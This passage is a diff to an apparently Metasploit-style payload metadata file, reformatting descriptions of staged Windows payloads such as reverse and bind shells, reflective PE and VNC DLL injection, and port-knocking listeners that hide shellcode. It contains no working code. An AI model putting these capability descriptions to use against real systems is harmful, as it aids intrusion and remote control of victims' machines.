-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker over IPv6",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -201702,7 +202267,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker via a named pipe pivot",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -201737,7 +202302,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker (No NX)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -201772,7 +202337,7 @@
      "ege <egebalci@pm.me>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -201809,7 +202374,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -201846,7 +202411,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -201884,7 +202449,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -201923,7 +202488,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -201962,7 +202527,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -201998,7 +202563,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker with UUID Support",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -202215,7 +202780,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -202253,7 +202818,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -202290,7 +202855,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -202328,7 +202893,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -202364,7 +202929,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -202400,7 +202965,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection (No NX)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -202437,7 +203002,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -202476,7 +203041,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -202513,7 +203078,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -202549,7 +203114,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Use an established connection",
+    "description": "Spawn a piped command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -202586,7 +203151,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker over IPv6",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -202622,7 +203187,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker (No NX)",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -202657,7 +203222,7 @@
      "spoonm <spoonm@no$email.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -202694,7 +203259,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -202731,7 +203296,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Spawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -202769,7 +203334,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -202808,7 +203373,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -202847,7 +203412,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -202884,7 +203449,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -202920,7 +203485,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -203132,7 +203697,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -203170,7 +203735,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -203207,7 +203772,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -203245,7 +203810,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -203281,7 +203846,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -203316,7 +203881,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection (No NX)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -203353,7 +203918,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -203392,7 +203957,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -203429,7 +203994,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -203465,7 +204030,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Use an established connection",
+    "description": "Uploads an executable and runs it (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -203502,7 +204067,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker over IPv6",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -203537,7 +204102,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker (No NX)",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -203573,7 +204138,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203610,7 +204175,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203647,7 +204212,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Uploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -203685,7 +204250,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203724,7 +204289,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203763,7 +204328,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203800,7 +204365,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -203836,7 +204401,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -203873,7 +204438,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -203911,7 +204476,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -203948,7 +204513,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -203986,7 +204551,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204022,7 +204587,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204058,7 +204623,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204095,7 +204660,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204134,7 +204699,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204171,7 +204736,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204207,7 +204772,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Use an established connection",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204245,7 +204810,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204281,7 +204846,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204317,7 +204882,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204354,7 +204919,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204390,7 +204955,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204426,7 +204991,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204463,7 +205028,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204500,7 +205065,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204538,7 +205103,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204577,7 +205142,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
